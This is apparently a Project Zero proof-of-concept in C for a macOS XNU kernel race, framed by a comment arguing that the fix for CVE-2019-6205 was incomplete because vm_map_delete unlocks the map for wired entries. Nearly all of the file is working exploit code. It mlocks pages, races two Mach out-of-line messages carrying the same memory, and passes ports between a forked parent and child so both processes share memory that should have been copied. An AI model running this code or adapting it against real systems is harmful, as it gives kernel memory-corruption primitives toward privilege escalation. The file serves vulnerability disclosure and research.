// ianbeer
#if 0
In my report for P0 issue 1728 (CVE-2019-6205) I said:

"Note that this lock dropping and reacquiring pattern seems quite pervasive; this isn't the only place in the code where this
happens; a proper fix for such issues will require some refactoring."

The XNU sources for 10.14.3 were recently released and I was finally able to take a look at the patch.

The patch is extremely minimal and completely ignored all the other places where the vm_map unlock and relock happens.

The patch restricts the optimization to now only apply to single vm_map_entries, so that the lock no longer has to be dropped
to kalloc new vm_map_copy objects.

Here's an example of what I meant by "this isn't the only place in the code where this happens."

In vm_map_delete, if a vm_map_entry within the range has a non-zero wired_count, then the vm_map's lock gets dropped and reacquired:

static kern_return_t
vm_map_delete(
	vm_map_t		map,
	vm_map_offset_t		start,
	vm_map_offset_t		end,
	int			flags,
	vm_map_t		zap_map)
{
    ...
	while ((entry != vm_map_to_entry(map)) && (s < end)) {
        ...
    		if (entry->wired_count) {
                ...
                vm_map_unlock(map);
                ... // do some stuff
                vm_map_lock(map);


wired_count can be made non-zero by mlock'ing the page.

The fundamental issue with this vulnerability is that the code is trying to implement move semantics for a vm_map_entry.
This is done by first copying the entry, then deleting it from the source map, via vm_map_delete.

*ANY* point between that copy being made, and the entry being successfully deleted where the vm_map is unlocked is bad.


#endif

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <signal.h>
#include <unistd.h>
#include <pthread.h>

#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/vm_region.h>
#include <mach/mach_error.h>
#include <mach/task.h>
#include <mach/task_special_ports.h>

#define MACH_ERR(str, err) do { \
  if (err != KERN_SUCCESS) {    \
    mach_error("[-]" str "\n", err); \
    exit(EXIT_FAILURE);         \
  }                             \
} while(0)

#define FAIL(str) do { \
  printf("[-] " str "\n");  \
  exit(EXIT_FAILURE);  \
} while (0)

#define LOG(str) do { \
  printf("[+] " str"\n"); \
} while (0)

/***************
 * port dancer *
 ***************/

// set up a shared mach port pair from a child process back to its parent without using launchd
// based on the idea outlined by Robert Sesek here: https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html

// mach message for sending a port right
typedef struct {
  mach_msg_header_t header;
  mach_msg_body_t body;
  mach_msg_port_descriptor_t port;
} port_msg_send_t;

// mach message for receiving a port right
typedef struct {
  mach_msg_header_t header;
  mach_msg_body_t body;
  mach_msg_port_descriptor_t port;
  mach_msg_trailer_t trailer;
} port_msg_rcv_t;

typedef struct {
  mach_msg_header_t  header;
} simple_msg_send_t;

typedef struct {
  mach_msg_header_t  header;
  mach_msg_trailer_t trailer;
} simple_msg_rcv_t;

#define STOLEN_SPECIAL_PORT TASK_BOOTSTRAP_PORT

// a copy in the parent of the stolen special port such that it can be restored
mach_port_t saved_special_port = MACH_PORT_NULL;

// the shared port right in the parent
mach_port_t shared_port_parent = MACH_PORT_NULL;

void setup_shared_port() {
  kern_return_t err;
  // get a send right to the port we're going to overwrite so that we can both
  // restore it for ourselves and send it to our child
  err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &saved_special_port);
  MACH_ERR("saving original special port value", err);

  // allocate the shared port we want our child to have a send right to
  err = mach_port_allocate(mach_task_self(),
                           MACH_PORT_RIGHT_RECEIVE,
                           &shared_port_parent);

  MACH_ERR("allocating shared port", err);

  // insert the send right
  err = mach_port_insert_right(mach_task_self(),
                               shared_port_parent,
                               shared_port_parent,
                               MACH_MSG_TYPE_MAKE_SEND);
  MACH_ERR("inserting MAKE_SEND into shared port", err);

  // stash the port in the STOLEN_SPECIAL_PORT slot such that the send right survives the fork
  err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, shared_port_parent);
  MACH_ERR("setting special port", err);
}

mach_port_t recover_shared_port_child() {
  kern_return_t err;

  // grab the shared port which our parent stashed somewhere in the special ports
  mach_port_t shared_port_child = MACH_PORT_NULL;
  err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &shared_port_child);
  MACH_ERR("child getting stashed port", err);

  LOG("child got stashed port");


  // say hello to our parent and send a reply port so it can send us back the special port to restore

  // allocate a reply port
  mach_port_t reply_port;
  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
  MACH_ERR("child allocating reply port", err);

  // send the reply port in a hello message
  simple_msg_send_t msg = {0};

  msg.header.msgh_size = sizeof(msg);
  msg.header.msgh_local_port = reply_port;
  msg.header.msgh_remote_port = shared_port_child;

  msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);

  err = mach_msg_send(&msg.header);
  MACH_ERR("child sending task port message", err);

  LOG("child sent hello message to parent over shared port");

  // wait for a message on the reply port containing the stolen port to restore
  port_msg_rcv_t stolen_port_msg = {0};
  err = mach_msg(&stolen_port_msg.header, MACH_RCV_MSG, 0, sizeof(stolen_port_msg), reply_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  MACH_ERR("child receiving stolen port\n", err);

  // extract the port right from the message
  mach_port_t stolen_port_to_restore = stolen_port_msg.port.name;
  if (stolen_port_to_restore == MACH_PORT_NULL) {
    FAIL("child received invalid stolen port to restore");
  }

  // restore the special port for the child
  err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, stolen_port_to_restore);
  MACH_ERR("child restoring special port", err);

  LOG("child restored stolen port");
  return shared_port_child;
}


mach_port_t recover_shared_port_parent() {
  kern_return_t err;

  // restore the special port for ourselves
  err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, saved_special_port);
  MACH_ERR("parent restoring special port", err);

  // wait for a message from the child on the shared port
  simple_msg_rcv_t msg = {0};
  err = mach_msg(&msg.header,
                 MACH_RCV_MSG,
                 0,
                 sizeof(msg),
                 shared_port_parent,
                 MACH_MSG_TIMEOUT_NONE,
                 MACH_PORT_NULL);
  MACH_ERR("parent receiving child hello message", err);

  LOG("parent received hello message from child");

  // send the special port to our child over the hello message's reply port
  port_msg_send_t special_port_msg = {0};

  special_port_msg.header.msgh_size        = sizeof(special_port_msg);
  special_port_msg.header.msgh_local_port  = MACH_PORT_NULL;
  special_port_msg.header.msgh_remote_port = msg.header.msgh_remote_port;
  special_port_msg.header.msgh_bits        = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg.header.msgh_bits), 0) | MACH_MSGH_BITS_COMPLEX;
  special_port_msg.body.msgh_descriptor_count = 1;

  special_port_msg.port.name        = saved_special_port;
  special_port_msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
  special_port_msg.port.type        = MACH_MSG_PORT_DESCRIPTOR;

  err = mach_msg_send(&special_port_msg.header);
  MACH_ERR("parent sending special port back to child", err);

  return shared_port_parent;
}

/*** end of port dancer code ***/

void* alloc_pages(size_t size) {
    // mmap a page
    void* ptr = mmap(NULL,
                     size,
                     PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE,
                     0,
                     0);
    printf("ptr %p\n", ptr);
    return ptr;
}

unsigned short get_wire_count(void* addr) {
    struct vm_region_basic_info_64 region_info = {0};
    kern_return_t kr;
    mach_vm_size_t size = 0;
    mach_msg_type_number_t count = VM_REGION_BASIC_INFO_COUNT_64;
    mach_port_t object_name = MACH_PORT_NULL;

    kr = mach_vm_region(mach_task_self(),
                        (mach_vm_address_t*)(&addr),
                        &size,
                        VM_REGION_BASIC_INFO_64,
                        (vm_region_info_t)(&region_info),
                        &count,
                        &object_name);
    if (kr != KERN_SUCCESS) {
        printf("mach_vm_region failed (%x)\n", kr);
        return 0;
    }

    printf("mach_vm_region success\n");

    return region_info.user_wired_count;
}

// this non-atomic page has a non-zero user_wire_count
// therefore the vm_map lock will be dropped in vm_map_delete...
void* get_nonatomic_alloc(size_t size) {
    void* mem = alloc_pages(size);

    // get the wired count
    unsigned short user_wire_count = get_wire_count(mem);
    printf("user_wire_count: 0x%x\n", user_wire_count);

    // wire it
    int lock_err = mlock(mem, size);
    if (lock_err != 0) {
        printf("mlock failed\n");
    } else {
        printf("mlock success!\n");
    }

    // get the wire count
    user_wire_count = get_wire_count(mem);
    printf("user_wire_count: 0x%x\n", user_wire_count);

    return mem;
}

struct send_msg {
  mach_msg_header_t hdr;
  mach_msg_body_t body;
  mach_msg_ool_descriptor_t desc;
};

struct rcv_msg {
  mach_msg_header_t hdr;
  mach_msg_body_t body;
  mach_msg_ool_descriptor_t desc;
  mach_msg_trailer_t trailer;
};

volatile int lock_a;
volatile int lock_b;

void* thread_func(void* arg) {
  lock_a = 1;
  while(lock_b == 0) {;}
  kern_return_t err = mach_msg_send((mach_msg_header_t*)arg);
  return (void*) err;
}

int go(mach_port_t shared_port) {
    size_t nonatomic_size = 0x10000;
    void* mem = get_nonatomic_alloc(nonatomic_size);
    memset(mem, 'X', nonatomic_size);

    // in two threads we need to send this page OOL at the same time

    // allocate two ports for the messages
    mach_port_t msg_a_port = MACH_PORT_NULL;
    mach_port_t msg_b_port = shared_port;
    kern_return_t err;
    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &msg_a_port);
    if (err != KERN_SUCCESS) {
        printf("mach_port_allocate failed: %x %s\n", err, mach_error_string(err));
        return 0;
    }
    #if 0
    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &msg_b_port);
    if (err != KERN_SUCCESS) {
        printf("mach_port_allocate failed: %x %s\n", err, mach_error_string(err));
        return 0;
    }
    #endif

    // two message structures to send at the same time
    struct send_msg msg_a = {};
    struct send_msg msg_b = {};

    // message a
    msg_a.hdr.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_MAKE_SEND, 0, 0, 0) | MACH_MSGH_BITS_COMPLEX;
    msg_a.hdr.msgh_size = sizeof(struct send_msg);
    msg_a.hdr.msgh_remote_port = msg_a_port;
    msg_a.hdr.msgh_local_port = MACH_PORT_NULL;
    msg_a.hdr.msgh_voucher_port = MACH_PORT_NULL;
    msg_a.hdr.msgh_id = 0x41424344;

    msg_a.body.msgh_descriptor_count = 1;

    msg_a.desc.type = MACH_MSG_OOL_DESCRIPTOR;
    msg_a.desc.copy = MACH_MSG_VIRTUAL_COPY;
    msg_a.desc.deallocate = 1;
    msg_a.desc.address = mem;
    msg_a.desc.size = nonatomic_size;

    // message b
    msg_b.hdr.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, 0) | MACH_MSGH_BITS_COMPLEX;
    msg_b.hdr.msgh_size = sizeof(struct send_msg);
    msg_b.hdr.msgh_remote_port = msg_b_port;
    msg_b.hdr.msgh_local_port = MACH_PORT_NULL;
    msg_b.hdr.msgh_voucher_port = MACH_PORT_NULL;
    msg_b.hdr.msgh_id = 0x41424344;

    msg_b.body.msgh_descriptor_count = 1;

    msg_b.desc.type = MACH_MSG_OOL_DESCRIPTOR;
    msg_b.desc.copy = MACH_MSG_VIRTUAL_COPY;
    msg_b.desc.deallocate = 1;
    msg_b.desc.address = mem;
    msg_b.desc.size = nonatomic_size;

    // try sending them in parallel;
    // need a thread we can try to sync with:
    lock_a = 0;
    lock_b = 0;
    
    pthread_t th;
    pthread_create(&th, NULL, thread_func, (void*)&msg_a);

    while(lock_a == 0){;}
    lock_b = 1;

    kern_return_t msg_b_err = mach_msg_send(&msg_b.hdr);

    void* remote_retval = 0;
    pthread_join(th, &remote_retval);
    kern_return_t msg_a_err = (kern_return_t)remote_retval;

    printf("msg_a send: %x %s\n", msg_a_err, mach_error_string(msg_a_err));
    printf("msg_b send: %x %s\n", msg_b_err, mach_error_string(msg_b_err));

    if (msg_a_err == KERN_SUCCESS && msg_b_err == KERN_SUCCESS) {
        printf("**** they both sent! ****\n");
    } else {
        printf("fail\n");
        // for now, destroy everything and go again

        mach_port_destroy(mach_task_self(), msg_a_port);
#if 0
        mach_port_destroy(mach_task_self(), msg_b_port);
#endif

        return 0;
    }

    // receive both the descriptors and look at the mem

    struct rcv_msg rcv_msg_a = {0};

    if (msg_a_err == KERN_SUCCESS) {
        rcv_msg_a.hdr.msgh_local_port = msg_a_port;
        rcv_msg_a.hdr.msgh_size = sizeof(struct rcv_msg);
        err = mach_msg_receive(&rcv_msg_a.hdr);
        if (err != KERN_SUCCESS) {
          printf("mach_msg_receive failed for msg_a_port: %x %s\n", err, mach_error_string(err));
          return 0;
        }
    }

#if 0
    struct rcv_msg rcv_msg_b = {0};

    if (msg_b_err == KERN_SUCCESS) {
        rcv_msg_b.hdr.msgh_local_port = msg_b_port;
        rcv_msg_b.hdr.msgh_size = sizeof(struct rcv_msg);
        err = mach_msg_receive(&rcv_msg_b.hdr);
        if (err != KERN_SUCCESS) {
          printf("mach_msg_receive failed for msg_b_port: %x %s\n", err, mach_error_string(err));
          return 0;
        }
    }
#endif

    mach_port_destroy(mach_task_self(), msg_a_port);
#if 0
    mach_port_destroy(mach_task_self(), msg_b_port);
#endif
    
    volatile char* rcv_a_addr = rcv_msg_a.desc.address;
    //volatile char* rcv_b_addr = rcv_msg_b.desc.address;

    printf("rcv_a_addr: %p\n", rcv_a_addr);
    //printf("rcv_b_addr: %p\n", rcv_b_addr);

    while (1) {
        *rcv_a_addr = 'X';
        *rcv_a_addr = 'O';
    }
#if 0
    printf("*a before: %c\n", *rcv_a_addr);

    //*rcv_b_addr = 'O';

    printf("*a after: %c\n", *rcv_a_addr);

#endif
    return 1;
}

void do_child(mach_port_t shared_port) {
    while(!go(shared_port)) {}
}

void do_parent(mach_port_t shared_port) {
  kern_return_t err;

  // wait for our child to send us an OOL message
  struct rcv_msg msg = {0};
  msg.hdr.msgh_local_port = shared_port;
  msg.hdr.msgh_size = sizeof(msg);
  err = mach_msg_receive(&msg.hdr);
  MACH_ERR("parent receiving child OOL message", err);

  volatile char* rcv_b_addr = msg.desc.address;
  
  printf("rcv_b_addr (parent): %p\n", rcv_b_addr);

  while(1) {
    printf("parent sees in OOL desc: %c\n", *rcv_b_addr);
    usleep(100000);
  }
}

int main(int argc, char** argv) {
  setup_shared_port();

  pid_t child_pid = fork();
  if (child_pid == -1) {
    FAIL("forking");
  }

  if (child_pid == 0) {
    mach_port_t shared_port_child = recover_shared_port_child();
    do_child(shared_port_child);
  } else {
    mach_port_t shared_port_parent = recover_shared_port_parent();
    do_parent(shared_port_parent);
  }

  kill(child_pid, 9);
  int status;
  wait(&status); 

  return 0;
}
